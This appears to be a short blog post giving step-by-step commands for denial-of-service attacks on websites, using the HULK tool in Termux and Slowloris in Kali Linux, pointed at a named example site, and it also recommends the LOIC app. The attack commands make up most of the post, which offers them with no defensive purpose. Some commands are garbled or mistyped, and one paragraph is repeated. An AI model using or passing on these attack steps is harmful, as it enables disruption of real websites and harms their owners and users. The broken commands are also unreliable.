Ads terra script

How hackers slow down a website.

 How hackers slow down a website?







Performing DOS Attack in Termux

apt update && upgrade

pkg install git

pkg install python

pkg install python2

git clone https://github.com/grafov/hulkgit

Is

cd Hulk

chmod +x Hulk.py

python2 Hulk.py http://abcwebsite.com



Performing DOS Attack in Kali

git clone https://github.com/gkbrk/slowloris

cd slowloris

Enter website IP Address here (eg 127.0.0.1

slowloris.py 127,0.0.1-s 500

You will be shocked to see the target

website will start loading and slow down.


There is an app named LOIC specially

developed to perform DOS attack

through your Android phone. You can

download it form Google.


Via Termux you can slow down websites

having "http" in the url

Whereas in Kali Linux "http" sites will slow

down but if you're lucky websites with

"https address might also start lagging.


Via Termux you can slow down websites

having "http" in the url

Whereas in Kali Linux "http" sites will slow

down but if you're lucky websites with

"https address might also start lagging

Post a Comment

0 Comments